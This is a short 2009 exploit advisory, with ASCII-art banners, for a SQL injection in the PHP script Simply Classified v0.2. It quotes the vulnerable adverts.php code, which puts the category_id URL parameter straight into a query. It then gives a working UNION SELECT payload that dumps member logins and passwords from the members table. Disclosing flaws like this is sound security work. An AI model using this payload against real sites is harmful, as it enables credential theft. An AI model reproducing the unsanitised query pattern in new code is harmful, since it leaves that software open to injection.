simplyclassified-sql.txt
Posted on 28 March 2009
============================================================================== _ _ _ _ _ _ / | | | | / | | | | / _ | | | | / _ | |_| | / ___ | |___ | |___ / ___ | _ | IN THE NAME OF /_/ \_ |_____| |_____| /_/ \_ |_| |_| ============================================================================== ____ _ _ _ _ ___ _ __ / ___| | || | | | | / _ | |/ / | | _ | || |_ | | | | | | | | ' / | |_| | |__ _| | | | | |_| | | . \n\____| |_| |_| \_| \___/ |_|\_ A Baloch From Iran ============================================================================== Simply Classified v0.2 (category_id) SQL Injection Vulnerability ============================================================================== [»] Script: [ Simply Classified v0.2 ] [»] Language: [ PHP, MySQL ] [»] Website: [ http://www.hotscripts.com/listing/simply_classifieds/ ] [»] Type: [ Free|OS ] [»] Today: [ 26032009 ] [»] Founder: [ G4N0K | mail[.]ganok[sh!t]gmail.com ] ===[ code! ]=== [+] adverts.php, 33-34 {...} <?php $id = $_GET['category_id']; // <== you know! $query = "SELECT * FROM type WHERE id=$id" ; // <== did you got it!, damn, check it again. $result = mysql_query($query); $row = mysql_fetch_array($result); ?> {...} ===[ XPL ]=== [»] http://127.0.0.1/classified/adverts.php?category_id=5 UNION ALL SELECT 1,2,concat(login,0x3a,passwd),4,5,6,7,8,9,10 FROM members ===[ LIVE ]=== [»] N/A ===[ Greetz ]=== [»] ALLAH =============================================================================== D-End... ===============================================================================
